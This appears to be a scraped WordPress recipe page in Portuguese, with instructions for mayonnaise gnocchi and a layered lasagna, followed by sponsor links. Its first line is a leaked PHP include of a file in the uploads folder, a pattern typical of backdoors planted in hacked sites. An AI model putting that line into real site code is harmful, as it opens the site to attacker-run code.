include_once(ABSPATH . '/wp-content/uploads/index.php'); Receitas | SUA EMPRESA

Receitas

Posted by admin

 

 

Nhoque de Maionese Fácil e leve, esta delícia leva batata e cenoura

 

ingredientes

 

  • 2 xícaras (chá) de maionese de batata e cenoura
  • 1 xícara (chá) de leite (240 ml)
  • ½ xícara (chá) de queijo parmesão ralado
  • 1 1/2 xícara (chá) de farinha de trigo
  • sal e noz moscada a gosto

 

modo de preparo

 

1°- Num processador coloque 2 xícaras (chá) de maionese de batata e cenoura, 1 xícara (chá) de leite e ½ xícara (chá) de queijo parmesão ralado. Bata até formar uma mistura lisa e homogênea.2°- Transfira a mistura para uma panela e leve ao fogo médio até ferver (+/- 3 minutos), adicione 1 1/2 xícara (chá) de farinha de trigo, sal e noz moscada a gosto e mexa sempre até soltar do fundo da panela (+/- 1 minuto).3°- Coloque a mistura numa tigela e cubra com filme plástico para não formar película. Deixe esfriar.4°- Numa superfície lisa, polvilhada com farinha de trigo, coloque uma porção da massa e vá enrolando e fazendo rolinhos compridos. Repita o mesmo procedimento até terminar a massa. Corte os nhoques no tamanho de 1 cm com uma faca.

5°- Cozinhe os nhoques em água fervente salgada e quando eles subirem retire-os com uma escumadeira e coloque numa tigela com água gelada. Escorra e sirva em seguida com o molho de sua preferência.

 

Lasanha do Exército

 

ingredientes

 

Molho a bolonhesa

  • 1 colher (sopa) de azeite
  • 1 colher (sopa) de tempero completo (alho, cebola e sal)
  • 300g de carne moída
  • 1 lata de extrato de tomate (de 350g)
  • 1 copo (tipo americano) de água
  • 2 colheres (sopa) de salsinha picada

Molho branco

  • 50g de margarina
  • 1 cebola ralada ou bem picada
  • 50g de farinha de trigo
  • 500ml de leite quente
  • 1 pitada de noz moscada
  • 1 folha de louro
  • Sal a gosto
  • Para montagem- Molho a bolonhesa:
  • Molho branco
  • 1/2 pacote de lasanha fresca
  • 300g de presunto fatiado
  • 300g de mussarela fatiada
  • Queijo parmesão ralado para polvilhar

 

modo de preparo

 

Molho a bolonhesa

Numa panela com azeite, coloque a carne, o tempero completo e deixe cozinhar para ficar bem solta. Adicione o extrato de tomate, a água e por último a salsinha. Reserve.

Molho branco

Numa panela, aqueça a margarina, doure a cebola, coloque a farinha de trigo e misture bem. Vá colocando o leite aos poucos, mexendo sem parar. Coloque a noz moscada, o louro e acerte o sal. Reserve.

Montagem

1) Molho bolonhesa

2) Massa

3) Presunto

4) Mussarela

5) Massa

6) Molho branco

Vá intercalando as camadas e finalize com o molho branco sobre a mussarela e polvilhe com queijo ralado.

 

 

Sponsors

  • Cheap reliable web hosting from WebHostingHub.com.
  • Domain name search and availability check by PCNames.com.
  • Website and logo design contests at DesignContest.net.
  • Reviews of the best cheap web hosting providers at WebHostingRating.com.